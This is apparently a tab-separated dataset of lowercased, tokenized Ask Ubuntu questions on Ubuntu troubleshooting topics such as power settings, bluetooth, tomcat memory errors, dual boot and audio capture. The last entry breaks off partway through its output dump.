434217	power actions do n't work as they are supposed to ?	i want to change closing lid and power button actions so i used power management in the settings , i 've changed `` when lid is closed '' to do nothing in both ac and battery , and `` power button action '' to suspend . but after i saved the settings and tired to close the lid the computer hibernates and the power button shuts it down . i tried to use dconf editor , well even after i changed the values and restarted my computer the actions did n't change when i tired to close the lid the computer hibernates and the power button shuts it down . ubuntu 13.10
434218	is there a way to limit the upload rate of a particular application ?	i am looking for a way to set the limit on the upload rate for an application without limiting the entire machine . the use case is the following : the user ( myself ) creates a large file with the intention of uploading it to a video hosting site . however , the files are large and the internet connection is slow . so it can take hours ( often tens of hours ) to upload these files . while the file uploads it is very difficult to use the internet . due to the complete take ofver the upstream by the file upload . the goal is to be able to limit the browser to 80 % of the internet connection speed . the perfect solution would be to be able to change the limit during the process of upload without having to restart anything or interrupt the upload itself . ( say the user wants to take the nap , bath , something to eat , etc , and is able to temporarily allow the upload to take the whole 100 % of the isp limit ) .
434219	auto update in ubuntu 13.10 desktop	my question is very basic and foolish one.i installed ubuntu 13.10 desktop 32 bit . now i want auto updates of security . i visited this ubuntu help page . but i waited whole day to see whether my updated starts automatically or not . no , it does n't . using gnome update manager -- -waited whole day using the `` unattended-upgrades '' package -- -unsuccessful attempt ca n't understand using cron and aptitude using cron-apt to handle automatic updating are these methods different or should i use all of them .
434221	proper package installation in ubuntu	i have read an introduction about ppa at ubuntu ppa and would like to revise my habit of installation in ubuntu : so , when i come to a web page , click download for ubuntu/linux version and install the package by double-click or run an install script . what type of installation is that ? is that the cause of unmet dependencies sometimes ?
434225	hp 5-button optical comfort mouse not supported	the kernel does recognize hid device , but identifies it as primax usb optical mouse . mouse does work , but cursor movement is inaccurate , it kind of `` sticks '' at higher speeds . the mouse works fine on mac os x snow leopard and windows 7 and 8 . also , additional mouse buttons are useless in ubuntu . i wish i could map them for desktop switching , window selection ...
434227	ndk_root enviroment variable defined but script does not see it	in my ~/.bashrc i have this : export android_sdk=~/devel/android_dev_x64/sdk export android_ndk=~/devel/android-ndk-r9d export ndk_root= $ android_ndk export cocos2dx_root=~/devel/cocos2d-x-2.2.2/cocos2dx export path= $ { path } : $ { android_sdk } /tools : $ { android_sdk } /platform-tools : $ { android_ndk } : $ { cocos2dx_root } when i type $ ndk_root in my terminal i can see taht it is defined however when i 'm running the script below it gives me : ndk_root not defined . please define ndk_root in your environment or in local.properties here is the script : # ndk_root= '' /opt/android/android-ndk '' appname= '' crystalcraze '' # options buildexternalsfromsource= parallel_build_flag= usage ( ) { cat < < eof usage : $ 0 [ options ] build c/c++ code for $ appname using android ndk options : -s build externals from source -p run make with -j8 option to take advantage of multiple processors -h this help eof } while getopts `` sph '' option ; do case `` $ option '' in s ) buildexternalsfromsource=1 ; ; p ) parallel_build_flag=\-j8 ; ; h ) usage exit 0 ; ; esac done # exit this script if any commmand fails set -e # read local.properties _localproperties_file= $ ( dirname `` $ 0 '' ) '' /local.properties '' if [ -f `` $ _localproperties_file '' ] then [ -r `` $ _localproperties_file '' ] || die `` fatal error : $ _localproperties_file exists but is unreadable '' # strip out entries with a `` . '' because bash can not process variables with a `` . '' _properties=`sed '/\./d ' `` $ _localproperties_file '' ` for line in `` $ _properties '' ; do declare `` $ line '' ; done fi # paths if [ -z `` $ { ndk_root+aaa } '' ] ; then echo `` ndk_root not defined . please define ndk_root in your environment or in local.properties '' exit 1 fi dir= '' $ ( cd `` $ ( dirname `` $ { bash_source [ 0 ] } '' ) '' & & pwd ) '' # ... use paths relative to current directory cocos2dx_root= '' $ dir/../../../.. '' app_root= '' $ dir/.. '' app_android_root= '' $ dir '' resrouce_root= '' $ app_root/../shared/games/crystalcraze/published-android '' bindings_js_root= '' $ app_root/../../../scripting/javascript/bindings/js '' echo echo `` paths '' echo `` ndk_root = $ ndk_root '' echo `` cocos2dx_root = $ cocos2dx_root '' echo `` app_root = $ app_root '' echo `` app_android_root = $ app_android_root '' echo # debug set -x # make sure assets is exist if [ -d `` $ app_android_root '' /assets ] ; then rm -rf `` $ app_android_root '' /assets fi mkdir `` $ app_android_root '' /assets # copy `` resources '' into `` assets '' cp -rf `` $ resrouce_root '' /* `` $ app_android_root '' /assets # copy bindings/*.js into assets ' root cp -f `` $ bindings_js_root '' /*.js `` $ app_android_root '' /assets echo `` using prebuilt externals '' echo set -x '' $ ndk_root '' /ndk-build $ parallel_build_flag -c `` $ app_android_root '' $ * \ `` ndk_module_path= $ { cocos2dx_root } : $ { cocos2dx_root } /cocos2dx/platform/third_party/android/prebuilt '' \ ndk_log=0 v=0
434228	bluetooth headset refusing to connect	i tried to switch the bluetooth on in the bluetooth settings window , and it simply refuses to switch on . i have installed the bluetooth manager from the software center , and it worked for a few days fine . when i tried pairing my wireless headphones to the laptop today , i ca n't get the bluetooth to turn on . if it does turn on in the status bar , it does n't in the settings . when i try to press 'setup new devices ' it says 'no adapters found ' . how can the adapter suddenly disappear ? however , if i restart the laptop , then the whole of the settings come , but it wo n't connect . as for connecting it to the headset , i used the bluetooth manager , but it wo n't connect . it will only add the device to the list . extra info : i tried connecting my phone to the laptop , and it works perfectly fine . i connect my headphone to the phone , and it works fine again . only when i pair my headphone and the laptop , it does n't work . the operating system is ubuntu 12.04 lts
434229	weird characters in terminal	when i try to run command in ubuntu i get the garbage characters appear on command line . please look at the image the line of characters are repetation [ [ -^ repeating it many times . how do i fix this problem ?
434230	ubuntu external ip addres	i 'm new to ubuntu and i need your help with this , as you know when you install apache you put the internal ip address in your browser and you get it works , i want as well to access it from somewhere else beside my local network how do i do that ?
434231	what is gnome , gnome classic and gnome classic ( no effects ) ?	i am using ubuntu 12.04 lts and i was using unity 2d and i wanted to switch to unity 3d so i logged out and clicked on the ubuntu sign and there were 3 new options : 1 gnome 2 gnome classic and 3 gnome classic ( no effects ) i started with all of the three one by one and i liked them but i dont what they are and how did i get them can anyone tell me what they are ? here is a screenshot of my desktop :
434232	auto mount in virtual box and ubuntu 13.04	how is it possible to auto mount in virtual box using linux 13:04 ? i tried to put in fstab and rc.local project/mnt/project vboxsf umask=002 , gid=1000 , uid=1000 but did not work can anyone help me ? when i put these files get an error on startup saying '' unable to mount / mnt / project '' thanks .
434233	ipsec offload support in 82576gb controller for linux	due to migration of servers to cloud computing , we bought several nics that support mechanisms like sriov and vmdq . furthermore , as security risk was also a concern and we did not want to create more overhead on the processor , ipsec offload support was essential . the model chosen was : intel gigabit et2 quad port svr adptr . ( with 82576gb controller ) : http : //ark.intel.com/products/49187/intel-gigabit-et2-quad-port-server-adapter however , we were unable to configure ipsec offload on linux . we tried to test on another server we have , a windows server 2012 r2 , but again without success . it seems that the driver for this controller is not available for windows server 2012 r2 , and linux . the test on windows would be only for verification purposes , we will not use this platform . could someone confirm this lack of support for linux ?
434235	installing ubuntu touch on micromax p300 tablet	i would like to know whether you will help install ubuntu touch on this tablet , model micromax p300 from your end .
434238	how to get options of choosing between windows 8 and ubuntu at start up ?	i installed ubuntu 13.10 alongside windows 8.1 in a separate partition . but on start up , windows 8.1 automatically boots without giving me options to choose between windows and ubuntu . plz help ! i want to choose os on start up !
434240	ctrl+l in terminal	i accidentally typed ctrl + l in terminal and my terminal window jumped one 'screenful ' size . i looked at the keyboard shortcuts in `` edit '' - > '' keyboard shortcuts '' and did n't find that shortcut . what does ctrl + l do and where is it defined ?
434241	kde-plasma-desktop ca n't find apps	i 'm running lubuntu 13.10 on my netbook and installed kde-plasma-desktop for a minimal kde desktop . would prefer to use openbox . however , there are no applications listed in the kickoff launcher under `` applications '' . and there are n't even any system settings other than advanced power management . this is with both openbox and plasma , and with kdm and lightdm . installed it first in synaptic , then purged it and reinstalled in terminal . no joy . saw a youtube video of some guy installing kde-plasma-desktop in a vm in unity . he had all his apps and complete system settings . i clean installed lubuntu 13.10 because i got tired of fighting kubuntu 13.10 . kubuntu 13.04 worked great . what gives here ? i 'd ask this on the kde forums but i lost my password and when i try to reset my password it says my user name does n't exist . which it does . i searched for it . grrr ...
434242	where is log file from rc.local ?	i have some commands to in my rc.local . i know that they are failing . how can i get log file with messages produced by executing rc.local ? where is it located ? i have checked the /var/log/boot.log . i know my messages are not there because i know already what is the reason of failure . but i still want to make sure from log file . note , i do n't want to run script again , i could but i do n't want . i would rather analyse wht happened during startup . thanks for any help . ubuntu 12.04 desktop ( if it matters )
434244	ubuntu not working , keeps freezing , unresponsive	i just replaced my windows 7 with ubuntu 12.04.1 and it has n't been doing any of the things the guides said it would . please do not mind that i am completely new to ubuntu . first of all , during installation , the guides said that i would be able to connect to the internet . i was not able to connect to our wifi , and even if i wired my laptop to the router it would not detect it . after a successful offline install , the os would frequently freeze and i would have to restart . i figured it may be issues with the drivers , but going through guides again , i 'm having problems since typing in commands do n't do anything . there is no response/output to any of the commands that i type and after a few attempts , everything would just freeze again . the results of running lspci -nn | grep vga from the terminal to identify my graphics hardware are : vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati device [ 1002:9903 ] i have an hp 4445s probook laptop with a broadcom 4313gn wireless adapter . where do i go from here ?
434251	was installing gcc 4.8 , ran out of diskspace now cant use gui , how to fix ?	i have tried removing programs , including the unfinished gcc 4.8 install , but i get the error unmet dependancies . all the files i have left are really important so i cant delete them . is there any other way i can fix this ?
434253	tomcat7 deployment error	i have a web application that i can build and test within my eclipse environment . it runs perfectly fine when i run the application within eclipse environment . however when i deployed it to my tomcat7 server on ubuntu , it reported errors . i launched my tomcat using the following command : sudo /etc/init.d/tomcat7 start and initially it prompted to be ok at server startup : * starting tomcat servlet engine tomcat7 [ ok ] but when i typed the address in the browser : http : //localhost:8080/restws , it did n't respond but just blank screen . then it timed out and crashed . i looked up the log file located at /var/log/tomcat7 , it shows the following error message : info : deploying web application archive /var/lib/tomcat7/webapps/restws.war mar 14 , 2014 11:19:49 am org.apache.catalina.startup.hostconfig deploywars severe : error waiting for multi-thread deployment of war files to complete java.util.concurrent.executionexception : java.lang.outofmemoryerror : java heap space at java.util.concurrent.futuretask.report ( futuretask.java:122 ) at java.util.concurrent.futuretask.get ( futuretask.java:188 ) at org.apache.catalina.startup.hostconfig.deploywars ( hostconfig.java:751 ) at org.apache.catalina.startup.hostconfig.deployapps ( hostconfig.java:471 ) at org.apache.catalina.startup.hostconfig.start ( hostconfig.java:1412 ) at org.apache.catalina.startup.hostconfig.lifecycleevent ( hostconfig.java:312 ) at org.apache.catalina.util.lifecyclesupport.firelifecycleevent ( lifecyclesupport.java:119 ) at org.apache.catalina.util.lifecyclebase.firelifecycleevent ( lifecyclebase.java:90 ) at org.apache.catalina.util.lifecyclebase.setstateinternal ( lifecyclebase.java:401 ) at org.apache.catalina.util.lifecyclebase.setstate ( lifecyclebase.java:346 ) at org.apache.catalina.core.containerbase.startinternal ( containerbase.java:1145 ) at org.apache.catalina.core.standardhost.startinternal ( standardhost.java:782 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) at org.apache.catalina.core.containerbase $ startchild.call ( containerbase.java:1566 ) at org.apache.catalina.core.containerbase $ startchild.call ( containerbase.java:1556 ) at java.util.concurrent.futuretask.run ( futuretask.java:262 ) at java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1145 ) at java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:615 ) at java.lang.thread.run ( thread.java:744 ) caused by : java.lang.outofmemoryerror : java heap space at org.apache.tomcat.util.bcel.classfile.code. < init > ( code.java:76 ) at org.apache.tomcat.util.bcel.classfile.attribute.readattribute ( attribute.java:140 ) at org.apache.tomcat.util.bcel.classfile.fieldormethod. < init > ( fieldormethod.java:58 ) at org.apache.tomcat.util.bcel.classfile.method. < init > ( method.java:72 ) at org.apache.tomcat.util.bcel.classfile.classparser.readmethods ( classparser.java:268 ) at org.apache.tomcat.util.bcel.classfile.classparser.parse ( classparser.java:128 ) at org.apache.catalina.startup.contextconfig.processannotationsstream ( contextconfig.java:2032 ) at org.apache.catalina.startup.contextconfig.processannotationsjar ( contextconfig.java:1923 ) at org.apache.catalina.startup.contextconfig.processannotationsurl ( contextconfig.java:1891 ) at org.apache.catalina.startup.contextconfig.processannotations ( contextconfig.java:1877 ) at org.apache.catalina.startup.contextconfig.webconfig ( contextconfig.java:1270 ) at org.apache.catalina.startup.contextconfig.configurestart ( contextconfig.java:855 ) at org.apache.catalina.startup.contextconfig.lifecycleevent ( contextconfig.java:345 ) at org.apache.catalina.util.lifecyclesupport.firelifecycleevent ( lifecyclesupport.java:119 ) at org.apache.catalina.util.lifecyclebase.firelifecycleevent ( lifecyclebase.java:90 ) at org.apache.catalina.core.standardcontext.startinternal ( standardcontext.java:5161 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) at org.apache.catalina.core.containerbase.addchildinternal ( containerbase.java:895 ) at org.apache.catalina.core.containerbase.addchild ( containerbase.java:871 ) at org.apache.catalina.core.standardhost.addchild ( standardhost.java:615 ) at org.apache.catalina.startup.hostconfig.deploywar ( hostconfig.java:958 ) at org.apache.catalina.startup.hostconfig $ deploywar.run ( hostconfig.java:1599 ) at java.util.concurrent.executors $ runnableadapter.call ( executors.java:471 ) ... 4 more mar 14 , 2014 11:19:49 am org.apache.catalina.startup.hostconfig deploydirectory info : deploying web application directory /var/lib/tomcat7/webapps/root mar 14 , 2014 11:20:03 am org.apache.catalina.startup.hostconfig deploydirectories severe : error waiting for multi-thread deployment of directories to completehostconfig.deploywar=deploying web application archive { 0 } java.util.concurrent.executionexception : java.lang.outofmemoryerror : java heap space at java.util.concurrent.futuretask.report ( futuretask.java:122 ) at java.util.concurrent.futuretask.get ( futuretask.java:188 ) at org.apache.catalina.startup.hostconfig.deploydirectories ( hostconfig.java:1018 ) at org.apache.catalina.startup.hostconfig.deployapps ( hostconfig.java:473 ) at org.apache.catalina.startup.hostconfig.start ( hostconfig.java:1412 ) at org.apache.catalina.startup.hostconfig.lifecycleevent ( hostconfig.java:312 ) at org.apache.catalina.util.lifecyclesupport.firelifecycleevent ( lifecyclesupport.java:119 ) at org.apache.catalina.util.lifecyclebase.firelifecycleevent ( lifecyclebase.java:90 ) at org.apache.catalina.util.lifecyclebase.setstateinternal ( lifecyclebase.java:401 ) at org.apache.catalina.util.lifecyclebase.setstate ( lifecyclebase.java:346 ) at org.apache.catalina.core.containerbase.startinternal ( containerbase.java:1145 ) at org.apache.catalina.core.standardhost.startinternal ( standardhost.java:782 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) at org.apache.catalina.core.containerbase $ startchild.call ( containerbase.java:1566 ) at org.apache.catalina.core.containerbase $ startchild.call ( containerbase.java:1556 ) at java.util.concurrent.futuretask.run ( futuretask.java:262 ) at java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1145 ) at java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:615 ) at java.lang.thread.run ( thread.java:744 ) caused by : java.lang.outofmemoryerror : java heap space at java.io.datainputstream.readutf ( datainputstream.java:661 ) at java.io.datainputstream.readutf ( datainputstream.java:564 ) at org.apache.tomcat.util.bcel.classfile.constantutf8. < init > ( constantutf8.java:48 ) at org.apache.tomcat.util.bcel.classfile.constant.readconstant ( constant.java:129 ) at org.apache.tomcat.util.bcel.classfile.constantpool. < init > ( constantpool.java:60 ) at org.apache.tomcat.util.bcel.classfile.classparser.readconstantpool ( classparser.java:209 ) at org.apache.tomcat.util.bcel.classfile.classparser.parse ( classparser.java:119 ) at org.apache.catalina.startup.contextconfig.processannotationsstream ( contextconfig.java:2032 ) at org.apache.catalina.startup.contextconfig.processannotationsjar ( contextconfig.java:1923 ) at org.apache.catalina.startup.contextconfig.processannotationsurl ( contextconfig.java:1891 ) at org.apache.catalina.startup.contextconfig.processannotations ( contextconfig.java:1877 ) at org.apache.catalina.startup.contextconfig.webconfig ( contextconfig.java:1270 ) at org.apache.catalina.startup.contextconfig.configurestart ( contextconfig.java:855 ) at org.apache.catalina.startup.contextconfig.lifecycleevent ( contextconfig.java:345 ) at org.apache.catalina.util.lifecyclesupport.firelifecycleevent ( lifecyclesupport.java:119 ) at org.apache.catalina.util.lifecyclebase.firelifecycleevent ( lifecyclebase.java:90 ) at org.apache.catalina.core.standardcontext.startinternal ( standardcontext.java:5161 ) at org.apache.catalina.util.lifecyclebase.start ( lifecyclebase.java:150 ) at org.apache.catalina.core.containerbase.addchildinternal ( containerbase.java:895 ) at org.apache.catalina.core.containerbase.addchild ( containerbase.java:871 ) at org.apache.catalina.core.standardhost.addchild ( standardhost.java:615 ) at org.apache.catalina.startup.hostconfig.deploydirectory ( hostconfig.java:1095 ) at org.apache.catalina.startup.hostconfig $ deploydirectory.run ( hostconfig.java:1617 ) at java.util.concurrent.executors $ runnableadapter.call ( executors.java:471 ) ... 4 more i 'm using tomcat 7 and jdk 7 on ubuntu 12.04 . so what caused the problem ? why did n't tomcat respond ? it worked fine when i launched it in eclipse though .
434259	batch converting swf to png	i have a folder with a lot of swf files . they are named that way : fis1.swf ; fis2.swf ; fis3.swf ; ... fis20.swf . i want to convert all of them into png files . i know it can be done with swfrender from swftools , but it only renders one file per time .
434262	hdmi to dvi cable causes blackscreen after looking at settings	i 've got a monitor hooked up through hdmi that i would like to start routing through my kvm . to do so , i have an hdmi to dvi dongle that i 've tested and works fine . i can hot-swap the hdmi cable for the hdmi- > dvi cable , and everything works fine - until i go to look at the settings . ( for what it 's worth , i 'm running 13.10 on the 3.14rc5 kernel . ) as soon as i run xrandr or try to go into the system display settings , it will blackscreen and not come back . i 'm guessing it 's because ubuntu is refreshing the screen or adapter information and that 's causing issues . so far , a cursory look through dmesg has n't been helpful . i 've tried lining up an xrandr command before i swap , swapping , then using the command to swap to a known working resolution , but that has n't worked either - making me think that ubuntu is recognizing this as a different output , maybe ? all of that in mind , is there a way to prevent ubuntu from switching resolutions ( which is what i think is happening ) without asking ?
434263	headphone continuously stops working in 13.10	i think when i first installed 13.10 on my windows 8 asus s550cm , the headphones were n't working . i tried suggestions in the following questions : headphones not working in 13.10 after update no audio in ubuntu after upgrade to 13.10 fix ubuntu 13.04 sound headphones not working and after a few restarts , with no clear solution , it is just fixed all of a sudden . a few more restarts and it stops working again . i go through the same suggestions , restarting , and nothing happens , until eventually i 'm restarting for some other reason , and they start working again . could this be updates that are enabling/disabling them ? what could be happening here ? update it seems that restarting the computer is not enough . once i shut down the computer and turn it on again ( without making any other adjustments ) the headphones work again . that seems to be the best solution so far , but i still have no idea why it 's happening .
434264	problem with deb installation	i converted minetest-classic-1402.00-src.tar.bz2 to minetest-classic_1402.00-1_all.deb using the software alien in the terminal , using the command , sudo alien -k minetest-classic-1402.00-src.tar.bz2 after installing the .deb using gdebi installer , it says that it is installed . i then go to the unity bar , and go to applications , and it is 'supposed ' to be there , since i thought it was a software .
434269	unity launcher wo n't update the shortcuts after update-desktop-database ( only after log out )	i have written my first unity launcher shortcuts and places them in ~/.local/share/applications/ . the problem is that the shortcuts wo n't update on any of the commands i trigger in the terminal . $ sudo updatedb $ update-desktop-database only when i log out and log back in then the shortcuts will update . i have tried putting the shortcuts in root directories /usr/share/applications/ and then the shortcuts are being updated instantaneously . what is the problem here ? what is triggered on log out that trigger the update ? edit i have tried this answer http : //askubuntu.com/a/353216/23006 to launch $ unity -- replace but it wo n't help . what will help is to go to altctrlf1-6 and restart lightdm by $ sudo service lightdm restart but let 's be honest - that 's not really a solution to restart the whole de for one unity launcher ...
434272	installation of unbutu on msi u120 netbook	how and what are the best versions of unbutu to install on a msi u120 netbook ? it has a intel atom atom 1.6 ghz cpu and memory of ddrii 1gb .
434277	specific encryption problem : use encrypted media on a system without root access	i have a specific problem related to encryption , and i need some help : i have an external drive , on which i store data on which i work , i.e . i need applications to be able to access those data ; i am going to work on some sensitive data ( very large files ) , thus i need encryption . the only issue i am trying to prevent is somebody taking the external hard drive and visualize those data on their own computer ; the computer i am working on is password protected ( i.e . you need user name and password ) ; i am not worried about somebody having access to temporary files through the computer i am using ; i do not have admin privileges on that computer ! ! ! but i may ask the admin to install a program , as long as i can then use it without admin rights . how can i encrypt the files but be able to work everyday on them ? i have tried with truecrypt , but it needs admin rights to run ; i have also tried disk utility : i have encrypted a file on my usb on my own laptop ( ubuntu 12.04 ) , but after i mount it and insert the password on the work computer , it says i do not have privileges to access the files . any ideas , please ? thank you , max edit : at the moment my work computer has got ubuntu 12.04 lts , just like my laptop . in a few weeks/months though i 'll have to switch to a new one , which is going to have centos . hope i wo n't have to look for a new encryption method all over again ... we 'll see .
434278	raid controller hardware compatability ?	i might be out of my element here , i am new to ubuntu server , and i am a intermediate linux/unix user , but zero experience with admin of such . i am trying to build a server to play with for media sharing/streaming ( intel hardware z77 , 3770k ) . i would like to add a sas raid controller card , but i am not able to find anything that says it will/wo n't work with ubuntu . i see some of the manufacturers say they work with linux , or major linux releases . is there a way to know for sure ? i could contact the manufacturers one by one , but i am curious if it supports linux will it work in ubuntu ? is there a brand that works better or more consistently with ubuntu like lsi , adaptec , hp , intel ? i am trying to add a pcie x8 card . thank you : ) d
434281	google earth-unsupported graphics card	i 've just installed google earth on my pc , which runs ubuntu 12.04 lts . when i open google earth , a window pop-ups and says : '' unsupported graphics card your graphics card does nor meet the minimum spec required to run google earth , which is a 3d accelerated card with shader support.it is strongly recommended that you try running google earth on a different machine or in a different rendering mode or upgrade to a newer graphics card.you may continue , but the application is unlikely to work . '' maybe you 'll say : '' buy a better graphics card ! `` , but i used google earth on this machine an year ago , when i had windows 7 & everything worked well , so my graphics card is good enough . the linux version has bigger requirements than the windows one or what ? ? ?
434282	open jdk does n't run my jar files	i decided to start java programming on linux instead of windows , but i can only open my projects in the netbeans ide . when i make the distribution into a .jar file , i ca n't open them . i already gave it the permission to be an executable file , but when i select open jdk jre ( either 6 or 7 ) , it just stays there . it does n't do anything and i do n't see why it happens . any help on what to do to proceed ? ps : the program i 'm trying to open has a gui and when i run it in netbeans it directly loads into the gui , instead of doing something at the console
434284	how to mount a backup drive read only ?	i have a backup external usb drive . i wonder how to tell the system to always mount it read only without explicitly telling him everytime sudo mount -o ro /dev/sde1 /media/backup note : my drive is not always attached to the system . i only attach it when i need something important from the backup . so i do n't want't to edit ftsab and when booting up it tells me that it has failed to mount drive because it does n't exist
434285	ubuntu builder `` desktop '' button greyed out	i have recently acquired ubuntu builder to build my own ubuntu based distribution . however , when i try to enter the desktop graphical mode , i can not as the button seems to be greyed out . i have selected a desktop environment , but that button is still just greyed out . it does n't allow me to click and go into graphical mode to see how the build is going . tried re-installing , but it has n't done anything in the slightest . everything else works .
434288	dual boot problem windows 8 & ubuntu	new to linux and am using ubuntu 12.04 lts . i 'm having problems with the boot manager , as the grub2 menu is not allowing me to launch windows 8 . the windows 8 launcher option gives me this message every time i use it : error : unknown command 'drivemap ' . error : invalid efi file path . press any key to continue ... i have run boot-repair and that got the ubuntu launcher working , but the problem with the windows launcher in grub stays persistent . http : //paste.ubuntu.com/7091293
434289	why `time` command does n't work with any option ?	i tried to use time command with -f option to format the output of time , but i get the following error : -f : command not found then i tried to use other options -a , -o , etc and i get the same error . not even time -- version does n't work ( -- version : command not found ) . do n't tell me to read the man because i already do it by many times ... all these options are specified there . so , where could be the problem ?
434291	usb video capture device : video displayed ok but no sound ?	i 'm trying to digitize my old video8 videos with a terratec grabsterav350mx usb device on a kubuntu system . video display , and capture on basis of v4l2 is no problem . however i can not get any sound . `` playing '' around with pulseaudio all of a sudden i surpringly got a reaction on one of the volume meters and succeeded to record the video sound with the following code : avconv -f alsa -ac 2 -ar 48000 -f pulse -i alsa_input.usb-0ccd_grabster_av_350-01-g350.analog-stereo -acodec libvorbis -aq 6 test.ogg so , in principle it works . the unfortunate thing is that i can not repeat this anymore , and being new to consciously using puleaudio i am afraid the notes i took while experimenting are not complete . can anyone advise which settings i have to do that i can playback/record from this usb capture device ? here the typical dumps : ~ $ aplay -l **** liste der hardware-geräte ( playback ) **** karte 0 : intel [ hda intel ] , gerät 0 : vt1708s analog [ vt1708s analog ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 0 : intel [ hda intel ] , gerät 3 : vt1708s digital [ vt1708s digital ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 ~ $ arecord -l **** liste der hardware-geräte ( capture ) **** karte 0 : intel [ hda intel ] , gerät 0 : vt1708s analog [ vt1708s analog ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 1 : g350 [ grabster av 350 ] , gerät 0 : usb audio [ usb audio ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 ~ $ pactl list short sinks | cut -f2 alsa_output.pci-0000_00_1b.0.analog-stereo alsa_output.pci-0000_00_1b.0.analog-stereo.equalizer ~ $ pactl list short sources | cut -f2 alsa_input.usb-0ccd_grabster_av_350-01-g350.analog-stereo alsa_output.pci-0000_00_1b.0.analog-stereo.monitor alsa_input.pci-0000_00_1b.0.analog-stereo alsa_output.pci-0000_00_1b.0.analog-stereo.equalizer.monitor ~ $ pactl list sinks sink # 0 status : suspended name : alsa_output.pci-0000_00_1b.0.analog-stereo beschreibung : internes audio analog stereo treiber : module-alsa-card.c sample-angabe : s16le 2ch 44100hz kanalzuordnung : front-left , front-right besitzermodul : 6 stumm : no lautstärke : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db verteilung 0,00 basislautstärke : 100 % 0,00 db quellenüberwachung : alsa_output.pci-0000_00_1b.0.analog-stereo.monitor latenz : 0 usec , eingestellt 0 usec merkmale : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency eigenschaften : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` vt1708s analog '' alsa.id = `` vt1708s analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xf9ff8000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 3a3e '' device.product.name = `` 82801ji ( ich10 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` internes audio analog stereo '' alsa.mixer_name = `` via vt1708s '' alsa.components = `` hda:11060397,10438346,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' profile : analog-output : analoge ausgabe ( priority : 9900 ) analog-output-headphones : analoge kopfhörer ( priority : 9000 , not available ) aktive profile : analog-output formate : pcm sink # 1 status : suspended name : alsa_output.pci-0000_00_1b.0.analog-stereo.equalizer beschreibung : fft based equalizer on internes audio analog stereo treiber : module-equalizer-sink.c sample-angabe : float32le 2ch 44100hz kanalzuordnung : front-left , front-right besitzermodul : 22 stumm : no lautstärke : 0 : 100 % 1 : 100 % verteilung 0,00 basislautstärke : 100 % quellenüberwachung : alsa_output.pci-0000_00_1b.0.analog-stereo.equalizer.monitor latenz : 0 usec , eingestellt 0 usec merkmale : hw_mute_ctrl latency eigenschaften : device.description = `` fft based equalizer on internes audio analog stereo '' device.master_device = `` alsa_output.pci-0000_00_1b.0.analog-stereo '' device.class = `` filter '' device.icon_name = `` audio-card '' formate : pcm ~ $ pactl list sources quelle # 0 status : suspended name : alsa_input.usb-0ccd_grabster_av_350-01-g350.analog-stereo beschreibung : grabster av 350 analog stereo treiber : module-alsa-card.c sample-angabe : s16le 2ch 44100hz kanalzuordnung : front-left , front-right besitzer-modul : 5 stumm : no lautstärke : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db verteilung 0,00 basis-lautstärke : 54 % -16,00 db sink-monitor : k. a. latenz : 0 usec , eingestellt 0 usec flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency eigenschaften : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` usb audio '' alsa.id = `` usb audio '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 1 '' alsa.card_name = `` grabster av 350 '' alsa.long_card_name = `` grabster av 350 at usb-0000:00:1a.7-6 , high speed '' alsa.driver_name = `` snd_usb_audio '' device.bus_path = `` pci-0000:00:1a.7-usb-0:6:1.1 '' sysfs.path = `` /devices/pci0000:00/0000:00:1a.7/usb1/1-6/1-6:1.1/sound/card1 '' udev.id = `` usb-0ccd_grabster_av_350-01-g350 '' device.bus = `` usb '' device.vendor.id = `` 0ccd '' device.vendor.name = `` terratec electronic gmbh '' device.product.id = `` 0084 '' device.product.name = `` grabster av 350 '' device.serial = `` 0ccd_grabster_av_350 '' device.string = `` front:1 '' device.buffering.buffer_size = `` 352800 '' device.buffering.fragment_size = `` 176400 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` grabster av 350 analog stereo '' alsa.mixer_name = `` usb mixer '' alsa.components = `` usb0ccd:0084 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-usb '' profile : analog-input-linein : line in ( priority : 8100 ) aktive profile : analog-input-linein formate : pcm quelle # 1 status : suspended name : alsa_output.pci-0000_00_1b.0.analog-stereo.monitor beschreibung : monitor of internes audio analog stereo treiber : module-alsa-card.c sample-angabe : s16le 2ch 44100hz kanalzuordnung : front-left , front-right besitzer-modul : 6 